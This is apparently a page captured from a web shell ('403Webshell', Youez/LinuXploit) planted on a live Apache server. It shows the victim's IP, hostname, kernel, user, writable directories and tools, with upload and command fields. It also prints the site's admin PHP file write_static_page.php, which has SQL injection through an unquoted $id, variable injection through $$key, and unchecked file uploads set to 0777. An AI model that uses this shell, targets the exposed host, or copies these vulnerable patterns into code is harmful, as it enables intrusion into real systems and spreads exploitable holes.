403Webshell
Server IP : 103.234.187.230  /  Your IP : 216.73.216.216
Web Server : Apache
System : Linux lserver42043-ind.megavelocity.net 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/rsdgroup/adminPanel/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/html/rsdgroup/adminPanel/write_static_page.php
<?php
include_once("session.php");
include_once("settings.php");
include_once("session.php");

/*echo "<pre>";
print_r($_REQUEST);
echo "<pre>";*/


foreach ($_REQUEST as $key => $value){
	 $$key = $value;
}
$EditDescription=addslashes($EditDescription);

$target_path = "../cat_images/headerImage/";
$prefix=time();
$target_path = $target_path . basename($prefix.$_FILES['header']['name']);

function uploadPhoto($fileName){ 
	if ($_FILES[$fileName]["error"] == 0) {
		$tmp_name = $_FILES[$fileName]["tmp_name"];
		$photoName = $_FILES[$fileName]["name"];
		$photoName = ereg_replace("[^A-Za-z0-9.]", "", $photoName);
		$photoNameArr = explode(".",$photoName);
		//echo "<pre>";print_r($photoNameArr);echo "</pre>";
		//echo count($photoNameArr)."<br>";
		$fileExt = strtolower($photoNameArr[count($photoNameArr)-1]);
		//echo $fileExt."<br>";
		unset($photoNameArr[count($photoNameArr)-1]);
		//echo "<pre>";print_r($photoNameArr);echo "</pre>";
		$photoNameWithoutExt = implode("_",$photoNameArr);
		//echo $photoNameWithoutExt."<br>";
		//$img1New = $photoNameWithoutExt.time().".".$fileExt;
		$img1New = $fileName.time().".".$fileExt;
		//echo $img1New."<br>"; die;
		if($fileExt == "png" || $fileExt == "gif" ){
			$img1New			=	$img1New;
			move_uploaded_file($tmp_name, "../cat_images/headerImage/".$img1New.""); 
			return  $img=  $img1New ;
		}
		else{  $img =''; ?>
			<script>
			document.location="static_page_list.php?page=listpage";
			</script>
		<?php }
	}
	else{ return  $img=  $img1New ; }
}

if($_REQUEST['mode']=="Edit"){ 

	$sqlUnlink		=	"SELECT * FROM `tbl_static_pages` WHERE `staticId` = ".$id."  LIMIT 1";
	$ressetUnlink	=	mysql_query($sqlUnlink) or die(mysql_error());
	$rowUnlink		=	mysql_fetch_assoc($ressetUnlink);
	$unlinkFile		=	$rowUnlink['headerImage'];

    $pageKey = sanitize_data(@$txtTitle);
	
    if($_FILES['header']['name']!="")
	{
		if(move_uploaded_file($_FILES['header']['tmp_name'], $target_path)) {
			chmod($target_path,0777);
			//echo "The file ". basename( $_FILES['file']['name']). " has been uploaded";
			$upload_image=basename($prefix.$_FILES['header']['name']);
		}
	   $bannerImg = "headerImage = '".$upload_image."',";
	   $sql	=	"UPDATE 
					`tbl_static_pages` SET 
						`parentId`			=	'".mysql_real_escape_string(@$parentId)."',
						`staticTitle`		=	'".mysql_real_escape_string(@$txtTitle)."',
						`pageKey`		    =	'".mysql_real_escape_string(@$pageKey)."',
						`linkType`			=	'".mysql_real_escape_string(@$linkType)."',
						`staticDescription`	=	'".@$EditDescription."',
						`headerDisplay`		=	'".mysql_real_escape_string(@$headerDisplay)."',
						`footerDisplay`		=	'".mysql_real_escape_string(@$footerDisplay)."',
						`leftDisplay`		=	'".mysql_real_escape_string(@$leftDisplay)."',
						`externalLink`		=	'".mysql_real_escape_string(@$externalLink)."',
						`metaTitle`			=	'".mysql_real_escape_string(@$metaTitle)."',
						`metaKeywords`		=	'".mysql_real_escape_string(@$metaKeyword)."',
						`metaDescription`	=	'".mysql_real_escape_string(@$metaDescription)."',
						`orderOfAppearance` =	'".mysql_real_escape_string(@$orderOfAppearance)."',
						".$bannerImg."
						`logo`				=	'".mysql_real_escape_string(@$logo)."',
						`thumbnail`			=	'".mysql_real_escape_string(@$thumbnail)."',
						`bannerColor`		=	'".mysql_real_escape_string(@$bannerColor)."',
						`enable`			=	'".mysql_real_escape_string(@$status)."',
						`updatedOn`			=	unix_timestamp(),
						`updatedBy`			=	'admin'
				WHERE 
					`staticId` = ".$id." 
				LIMIT 1 ";
	  mysql_query($sql);
	  
	   if($upload_image != ''){
		@unlink("../cat_images/headerImage/".$unlinkFile);
	   }
	}
     else {  
	 $sql	=	"UPDATE 
					`tbl_static_pages` SET 
						`parentId`			=	'".mysql_real_escape_string(@$parentId)."',
						`staticTitle`		=	'".mysql_real_escape_string(@$txtTitle)."',
						`pageKey`		    =	'".mysql_real_escape_string(@$pageKey)."',
						`linkType`			=	'".mysql_real_escape_string(@$linkType)."',
						`staticDescription`	=	'".@$EditDescription."',
						`headerDisplay`		=	'".mysql_real_escape_string(@$headerDisplay)."',
						`footerDisplay`		=	'".mysql_real_escape_string(@$footerDisplay)."',
						`leftDisplay`		=	'".mysql_real_escape_string(@$leftDisplay)."',
						`externalLink`		=	'".mysql_real_escape_string(@$externalLink)."',
						`metaTitle`			=	'".mysql_real_escape_string(@$metaTitle)."',
						`metaKeywords`		=	'".mysql_real_escape_string(@$metaKeyword)."',
						`metaDescription`	=	'".mysql_real_escape_string(@$metaDescription)."',
						`orderOfAppearance` =	'".mysql_real_escape_string(@$orderOfAppearance)."',
						`logo`				=	'".mysql_real_escape_string(@$logo)."',
						`thumbnail`			=	'".mysql_real_escape_string(@$thumbnail)."',
						`bannerColor`		=	'".mysql_real_escape_string(@$bannerColor)."',
						`enable`			=	'".mysql_real_escape_string(@$status)."',
						`updatedOn`			=	unix_timestamp(),
						`updatedBy`			=	'admin'
				WHERE 
					`staticId` = ".$id." 
				LIMIT 1 ";
	    mysql_query($sql);
	 }			
	
}
else{

    if(move_uploaded_file($_FILES['header']['tmp_name'], $target_path)) {
			chmod($target_path,0777);
			//echo "The file ". basename( $_FILES['file']['name']). " has been uploaded";
			$headerImage=basename($prefix.$_FILES['header']['name']);
	}
		
	//$headerImage	=	uploadPhoto("header");
	$pageKey = sanitize_data(@$txtTitle);
	$sql	=	sprintf("INSERT INTO 
					`tbl_static_pages`(
							`parentId`,
							`staticTitle`,
							`pageKey`,
							`staticDescription`,
							`linkType`,
							`headerDisplay`,
							`footerDisplay`,
							`leftDisplay`,
							`externalLink`,
							`metaTitle`,
							`metaKeywords`,
							`metaDescription`,
							`orderOfAppearance`,
							`bannerColor`,
							`enable`,
							`headerImage`,
							`thumbnail`,
							`createdOn`,
							`createdBy`)
						VALUES
							('%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s',unix_timestamp(),'admin')",
							mysql_real_escape_string(@$parentId),
							mysql_real_escape_string(@$txtTitle),
							mysql_real_escape_string(@$pageKey),
							@$EditDescription,
							mysql_real_escape_string(@$linkType),
							mysql_real_escape_string(@$headerDisplay),
							mysql_real_escape_string(@$footerDisplay),
							mysql_real_escape_string(@$leftDisplay),
							mysql_real_escape_string(@$externalLink),
							mysql_real_escape_string(@$metaTitle),
							mysql_real_escape_string(@$metaKeyword),
							mysql_real_escape_string(@$metaDescription),
							mysql_real_escape_string(@$orderOfAppearance),
							mysql_real_escape_string(@$bannerColor),
							mysql_real_escape_string(@$status),
							mysql_real_escape_string(@$headerImage),
							mysql_real_escape_string(@$thumbnail));
}

$result=mysql_query($sql) or die(mysql_error());
?>
<script>
	document.location="static_page_list.php?page=listpage";
</script>

Youez - 2016 - github.com/yon3zu
LinuXploit